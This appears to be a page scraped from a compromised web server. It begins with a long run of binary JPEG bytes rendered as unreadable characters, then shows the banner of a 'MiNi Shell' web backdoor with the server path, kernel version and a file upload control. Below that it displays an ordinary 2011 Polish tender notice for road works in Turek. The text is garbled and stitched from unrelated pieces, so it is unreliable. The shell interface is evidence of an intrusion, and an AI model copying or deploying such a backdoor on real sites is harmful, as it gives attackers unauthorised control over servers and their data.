JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110124/26891-N-2011.html

<p class="kh_header"><b>Turek: BUDOWA I REMONT UKŁADU KOMUNIKACYJNEGO OBEJMUJĄCEGO ULICE: MUCHLIŃSKĄ, SPOKOJNĄ, WESOŁĄ, PRZYJEMNĄ, ŁAGODNĄ, UROCZĄ, NASTROJOWĄ W TURKU</b><br>
<b>Numer ogłoszenia: 26891 - 2011; data zamieszczenia: 24.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Turku , ul. Kaliska 59, 62-700 Turek, woj. wielkopolskie, tel. 063 289 61 00, faks 063 289 61 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.miastoturek.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BUDOWA I REMONT UKŁADU KOMUNIKACYJNEGO OBEJMUJĄCEGO ULICE: MUCHLIŃSKĄ, SPOKOJNĄ, WESOŁĄ, PRZYJEMNĄ, ŁAGODNĄ, UROCZĄ, NASTROJOWĄ W TURKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia publicznego obejmuje do wykonania następujący zakres rzeczowy robót:
1.Ulica Muchlińska - etap I - dł.484,00 m:
nawierzchnia asfaltowa wraz z podbudową - po 3251,00 m2;
nawierzchnia z kostki brukowej betonowej gr. 8 cm (jezdnia przy ul. Konińskiej) - 108,40 m2;
nawierzchnia z kostki brukowej betonowej gr. 8 cm (zatoki postojowe) - 567,00 m2;
nawierzchnia z kostki brukowej betonowej gr. 8 cm (zjazdy) - 435,90 m2;
nawierzchnia z kostki brukowej betonowej gr. 6 cm (ścieżka rowerowa) - 695,00 m2;
nawierzchnia z kostki brukowej betonowej gr. 6 cm (chodnik) - 1780,80 m2;
usunięcie kolizji elektroenergetycznych;
usunięcie kolizji elektroenergetycznych oświetlenia ulicznego;
przebudowa sieci telekomunikacyjnej;
budowa kanalizacji 3-otworowej z rur RHDPEp110/6,3 na potrzeby telewizji kablowej, monitoringu i telekomunikacji - 296,00 m;
nawierzchnia (w pasie drogi krajowej nr 72 - ul. Konińska) z kostki brukowej betonowej gr. 8 cm - 79,00 m2;
nawierzchnia (w pasie drogi krajowej nr 72 - ul. Konińska)z kostki brukowej betonowej gr. 6 cm (chodnik ze ścieżka rowerową) - 88,00 m2;
przebudowa sieci telekomunikacyjnej w pasie drogi krajowej nr 72 - ul. Konińska - 17,00 m;
2.Ulica Spokojna - etap II - dł. 283,00 m:
nawierzchnia asfaltowa wraz z podbudową - po 1794,00 m2;
nawierzchnia z kostki brukowej betonowej gr. 8 cm (jezdnia) - 524,70 m2;
nawierzchnia z kostki brukowej betonowej gr. 8 cm (zatoki postojowe) - 512,00 m2;
nawierzchnia z kostki brukowej betonowej gr. 8 cm (zjazdy) - 262,00 m2;
nawierzchnia z kostki brukowej betonowej gr. 6 cm (ścieżka rowerowa) - 603,70 m2;
nawierzchnia z kostki brukowej betonowej gr. 6 cm (chodnik) - 1190,00 m2;
usunięcie kolizji elektroenergetycznych oświetlenia ulicznego;
budowa kanalizacji 3-otworowej z rur RHDPEp110/6,3 na potrzeby telewizji kablowej, monitoringu i telekomunikacji - 245,00 m;
3.Ulica Spokojna - etap VIII - dł.370,00 m:
nawierzchnia asfaltowa wraz z podbudową - po 2272,072 m2;
nawierzchnia z kostki brukowej betonowej gr. 8 cm (zatoki postojowe) - 282,96 m2;
nawierzchnia z kostki brukowej betonowej gr. 8 cm (zjazdy) - 391,55 m2;
nawierzchnia z kostki brukowej betonowej gr. 6 cm (chodnik) - 1352,26 m2;
usunięcie kolizji elektroenergetycznych;
usunięcie kolizji elektroenergetycznych oświetlenia ulicznego;
budowa kanalizacji 3-otworowej z rur RHDPEp110/6,3 na potrzeby telewizji kablowej, monitoringu i telekomunikacji - 360,00 m;
4.Ulica Wesoła - etap IX - dł. 333,50 m:
nawierzchnia asfaltowa wraz z podbudową - po 2001,54 m2;
nawierzchnia z kostki brukowej betonowej gr. 8 cm (zatoki postojowe) - 514,15 m2;
nawierzchnia z kostki brukowej betonowej gr. 8 cm (zjazdy) - 205,81 m2;
nawierzchnia z kostki brukowej betonowej gr. 6 cm (chodnik) - 963,18 m2;
usunięcie kolizji elektroenergetycznych;
budowa kanalizacji 3-otworowej z rur RHDPEp110/6,3 na potrzeby telewizji kablowej, monitoringu i telekomunikacji - 289,00 m;
5.Ulica Nastrojowa - etap X - dł. 148,50 m:
nawierzchnia z kostki brukowej betonowej gr. 8 cm (jezdnia) - 848,25 m2;
nawierzchnia z kostki brukowej betonowej gr. 8 cm (parking) - 46,00 m2;
nawierzchnia z kostki brukowej betonowej gr. 8 cm (zjazdy) - 144,69 m2;
nawierzchnia z kostki brukowej betonowej gr. 6 cm (chodnik) - 423,60 m2;
usunięcie kolizji elektroenergetycznych;
usunięcie kolizji elektroenergetycznych oświetlenia ulicznego;
6.Ulica Urocza - etap XI - dł. 148,50 m:
nawierzchnia z kostki brukowej betonowej gr. 8 cm (jezdnia) - 853,25 m2;
nawierzchnia z kostki brukowej betonowej gr. 8 cm (parking) - 69,00 m2;
nawierzchnia z kostki brukowej betonowej gr. 8 cm (zjazdy) - 140,07 m2;
nawierzchnia z kostki brukowej betonowej gr. 6 cm (chodnik) - 406,23 m2;
usunięcie kolizji elektroenergetycznych;
usunięcie kolizji elektroenergetycznych oświetlenia ulicznego;
7.Ulica Łagodna - etap XII - dł. 148,50 m:
nawierzchnia z kostki brukowej betonowej gr. 8 cm (jezdnia + parking) - 849,25 m2;
nawierzchnia z kostki brukowej betonowej gr. 8 cm (zatoki postojowe) - 69,00 m2;
nawierzchnia z kostki brukowej betonowej gr. 8 cm (zjazdy) - 150,83 m2;
nawierzchnia z kostki brukowej betonowej gr. 6 cm (chodnik) - 457,20 m2;
usunięcie kolizji elektroenergetycznych;
usunięcie kolizji elektroenergetycznych oświetlenia ulicznego;
budowa kanalizacji 3-otworowej z rur RHDPEp110/6,3 na potrzeby telewizji kablowej, monitoringu i telekomunikacji - 146,00 m;
8.Ulica Przyjemna - etap XIII - dł. 148,50 m:
nawierzchnia z kostki brukowej betonowej gr. 8 cm (jezdnia) - 852,05 m2;
nawierzchnia z kostki brukowej betonowej gr. 8 cm (parking) - 80,50 m2;
nawierzchnia z kostki brukowej betonowej gr. 8 cm (zjazdy) - 114,36 m2;
nawierzchnia z kostki brukowej betonowej gr. 6 cm (chodnik) - 440,745 m2;
usunięcie kolizji elektroenergetycznych;
budowa kanalizacji 3-otworowej z rur RHDPEp110/6,3 na potrzeby telewizji kablowej, monitoringu i telekomunikacji - 147,00 m;
9.Remont ulicy Spokojnej - od ul. Zabawnej do ul. Słowackiego - dł. 80,00 m:
remont nawierzchni asfaltowej  - 480,00 m2;
przełożenie kostki brukowej betonowej gr. 8 cm (zjazdy) - 141,20 m2;
przełożenie kostki brukowej betonowej gr. 6 cm (chodnik) - 289,50 m2;.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu o udzielenie zamówienia publicznego zamawiający żąda wniesienia wadium przetargowego w wysokości 100.000,00 PLN  (słownie złotych: sto tysięcy)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych polegających na budowie / przebudowie maksimum czterech dróg o łącznej umownej wartości brutto minimum 8.000.000 złotych (słownie złotych: osiem milionów).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie następującymi urządzeniami technicznymi niezbędnymi do realizacji zamówienia:
a)wytwórnią mas bitumicznych o wydajności nie mniejszej niż 100 Mg/h, zlokalizowaną od miejsca wykonywania zamówienia w odległości gwarantującej czas transportu mieszanki spełniający wymagania określone w Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych- liczba jednostek: 1 
b)układarką do mas bitumicznych o szerokości min. 4 m - liczba jednostek: 1 
c)układarką do podbudów z kruszyw łamanych - liczba jednostek: 1
d)walcami drogowymi - liczba jednostek: 3</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie osobami legitymującymi się kwalifikacjami odpowiednimi do funkcji, jakie zostaną im powierzone. Na tej podstawie znajdująca się w dyspozycji wykonawcy osoba na każdą funkcję wymienioną poniżej, powinna posiadać następujące uprawnienia:
a)do kierowania budową udzielone w specjalności drogowej;
b)do kierowania robotami budowlanymi udzielone w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;
c)do kierowania robotami  specjalności telekomunikacyjnej.
lub uprawnienia budowlane udzielone w zakresie odpowiadającym zakresowi specjalności, o której mowa wyżej, uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca 1994 r. Prawo budowlane lub kwalifikacje zawodowe uznane na zasadach określonych w przepisach odrębnych, w szczególności na podstawie ustawy z dnia 18 marca 2008 r. w o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63, poz. 394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia nie mniejszą niż 500.000 PLN (słownie złotych: pięćset tysięcy)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wszelkie zmiany, z zastrzeżeniem w § 11 ust. 4 i § 13 ust. 4 wzoru umowy, wymagają aneksu sporządzonego z zachowaniem formy pisemnej pod rygorem nieważności w przypadkach wyszczególnionych w umowie i w przypadku wystąpienia zdarzeń obiektywnie niezależnych od zamawiającego lub wykonawcy, które zasadniczo i istotnie utrudniają wykonywanie części lub całości zobowiązań wynikających z umowy, których zamawiający lub wykonawca nie mógł przewidzieć i którym nie mógł zapobiec ani ich przezwyciężyć i im przeciwdziałać.
2.W przypadku zmiany przez władzę ustawodawczą w okresie obowiązywania umowy procentowej stawki podatku VAT, wysokość wynagrodzenia zostanie aneksem do niniejszej umowy odpowiednio dostosowana.
3.Zmiana terminu wykonania umowy może nastąpić m.in. w następujących przypadkach: 
1.w przypadku wstrzymania lub zawieszenia robót przez zamawiającego lub gestora sieci gazowej, elektroenergetycznej i telekomunikacyjnej,
2.działań osób trzecich lub organów władzy publicznej, które spowodują przerwanie lub czasowe zawieszenie realizacji zamówienia,
3.z powodu siły wyższej, 
4.	w przypadku wykopalisk archeologicznych uniemożliwiających wykonywanie robót,
5.w przypadku znalezienia na terenie budowy przedmiotów wybuchowych i niebezpiecznych pochodzenia wojskowego, których termin usuwania będzie miał wpływ na termin realizacji robót.
W wyżej wymienionych wypadkach termin wykonania umowy może ulec wydłużeniu o okres, w którym roboty będące przedmiotem zamówienia nie mogły być prowadzone. Jednakże w ww. sytuacjach wykonawca w pierwszej kolejności zobowiązany jest do wykonywania robót, w zakresie których przeszkody nie wystąpiły.
4.	Zmiana wynagrodzenia jest dopuszczalna w przypadku rezygnacji przez zamawiającego z części zakresu robót określonej w dokumentacji projektowej lub zastosowania rozwiązań zamiennych w dokumentacji projektowej.
5.Dopuszczalne są również zmiany w umowie:
a) w zakresie kluczowego personelu wykonawcy na osobę o równoważnych 	uprawnieniach, jak określone w SIWZ,
b) zmiana podwykonawcy na etapie realizacji robót, 
c) zmiana przez wykonawcę formy zabezpieczenia należytego wykonania umowy, na równoważne wartościowo,
d) w przypadku aktualizacji rozwiązań z uwagi na postęp technologiczny lub 	zmiany obowiązujących przepisów,
e) w przypadku zaistnienia okoliczności powodujących, że przedmiot umowy nie może zostać zrealizowany zgodnie z zasadami wiedzy inżynierskiej;
f) w przypadku zmian obowiązującego prawa powodujących, że realizacja 	przedmiotu umowy w niezmienionej postaci stanie się niecelowa;
g) ilości wystawianych faktur dla danej drogi,
h) w przypadku udzielenia zaliczek wykonawcy na poczet wykonania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.miastoturek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Turku
Biuro Zamówień Publicznych i Zakupów (p.110)
ul. Kaliska 59
62-700 Turek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.02.2011 godzina 11:00, miejsce: Urząd Miejski w Turku
Biuro Obsługi Klienta (parter)
ul. Kaliska 59
62-700 Turek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie publiczne objęte jest współfinansowaniem w ramach Narodowego Programu Przebudowy Dróg Lokalnych 2008-2011.
Wykonawca, którego oferta zostanie wybrana będzie musiał wnieść zabezpieczenie należytego wykonania umowy w wysokości 4 % ceny całkowitej podanej w ofercie wykonawcy.
Zgodnie z art. 27 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych oświadczenia, wnioski, zawiadomienia oraz informacje w zakresie wszelkiej korespondencji między stronami postępowania zamawiający i wykonawcy przekazują w postępowaniu w formie pisemnej lub faksem (nr faksu zamawiającego 63 289 61 59).</p>
